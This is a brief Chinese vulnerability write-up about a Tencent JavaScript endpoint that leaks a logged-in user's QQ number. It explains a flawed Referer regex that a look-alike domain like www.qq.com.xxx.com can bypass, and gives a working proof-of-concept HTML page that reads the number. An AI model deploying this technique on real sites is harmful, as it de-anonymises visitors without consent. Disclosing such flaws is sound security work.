腾讯接口读取QQ号码漏洞

腾讯有个接口,如果用户登录后,就从Cookie中提取QQ号码:

http://iyouxi.vip.qq.com/act_user_info.php?cmd=login

这个接口内容是返回一段Javascript代码,其中为_vip_act_uin变量赋值了QQ号码:

<script src="http://iyouxi.vip.qq.com/act_user_info.php?cmd=login"></script>

但是实际上发现读不出,因为这个接口判断了Referer,必须是来源于**.qq.com 域。这给了我们很大限制,还好写Referer判断的人正则表达式不过关,他并不是完全匹配Referer中是否是**.qq.com,所以我把上面那段Javascript引用的代码放到www.qq.com.xxx.com的域名上,即可读出QQ号。其中www.qq.com.xxx.com的代码如下:

<!doctype html>
<html>
  <head>
    <title>Test</title>
    <script type="text/javascript" src="http://iyouxi.vip.qq.com/act_user_info.php?cmd=login"></script>
    <script type="text/javascript">
      alert(_vip_act_uin);
    </script>
  </head>
  <body>
  </body>
</html>